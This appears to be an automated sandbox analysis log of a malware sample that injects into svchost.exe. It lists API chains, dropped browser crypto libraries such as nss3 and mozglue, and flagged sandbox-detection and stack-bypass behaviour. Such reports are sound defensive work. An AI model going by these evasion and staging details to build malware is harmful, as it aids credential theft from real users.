            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.1.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.1.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.1.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000001.00000002.1816474676.0000000006708000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.1.dr
            Source: cJX8BV8LYG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cJX8BV8LYG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cJX8BV8LYG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cJX8BV8LYG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cJX8BV8LYG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: ucrtbase.dll.1.drStatic PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: msvcp140.dll.1.drStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A0A76 push ecx; ret 0_2_007A0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D86E push 0040D89Ch; ret 1_2_0040D894
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D870 push 0040D89Ch; ret 1_2_0040D894
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004140C0 push 004140ECh; ret 1_2_004140E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004108C8 push 004108F4h; ret 1_2_004108EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B0F7 push 0040B124h; ret 1_2_0040B11C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B0F8 push 0040B124h; ret 1_2_0040B11C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408080 push 004080B8h; ret 1_2_004080B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408158 push 00408196h; ret 1_2_0040818E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408970 push 004089E4h; ret 1_2_004089DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408994 push 004089E4h; ret 1_2_004089DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004089AC push 004089E4h; ret 1_2_004089DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415208 push 0041528Ch; ret 1_2_00415284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CA0C push 0040CA3Ch; ret 1_2_0040CA34
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040CA10 push 0040CA3Ch; ret 1_2_0040CA34
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417AEC push 00417B18h; ret 1_2_00417B10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00404BC0 push 00404C11h; ret 1_2_00404C09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D3C0 push 0040D3ECh; ret 1_2_0040D3E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A3E4 push 0040A410h; ret 1_2_0040A408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C390 push 0040C3C0h; ret 1_2_0040C3B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040C394 push 0040C3C0h; ret 1_2_0040C3B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A3AC push 0040A3D8h; ret 1_2_0040A3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC44 push 0040DCA3h; ret 1_2_0040DC9B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DC0C push 0040DC38h; ret 1_2_0040DC30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B41E push 0040B44Ch; ret 1_2_0040B444
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040B420 push 0040B44Ch; ret 1_2_0040B444
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A438 push 0040A464h; ret 1_2_0040A45C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A4F4 push 0041A51Ah; ret 1_2_0041A512
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414C80 push 00414CACh; ret 1_2_00414CA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409488 push 004094B8h; ret 1_2_004094B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A4AC push 0041A4E8h; ret 1_2_0041A4E0
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\ucrtbase.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\mozglue.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\vcruntime140.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\msvcp140.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_0079F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0079F98E
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00811C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00811C41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_00417B1A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97654
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeAPI/Special instruction interceptor: Address: 1E43214
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeAPI coverage: 4.0 %
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_007EDBBE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F68EE FindFirstFileW,FindClose,0_2_007F68EE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_007F698F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED076
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007ED3A9
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F9642
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007F979D
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_007F9B2B
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_007F5C97
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,1_2_004098A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D0A0 FindFirstFileW,1_2_0040D0A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004087DC FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,1_2_004087DC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040D06E FindFirstFileW,1_2_0040D06E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041303C FindFirstFileW,FindNextFileW,FindClose,1_2_0041303C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040989F FindFirstFileW,FindNextFileW,FindClose,1_2_0040989F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,1_2_004111C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,1_2_00414408
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00415610 FindFirstFileW,FindNextFileW,FindClose,1_2_00415610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,1_2_00408D3C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,1_2_00412D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041158C FindFirstFileW,FindNextFileW,FindClose,1_2_0041158C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411590 FindFirstFileW,FindNextFileW,FindClose,1_2_00411590
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,1_2_00412D9C
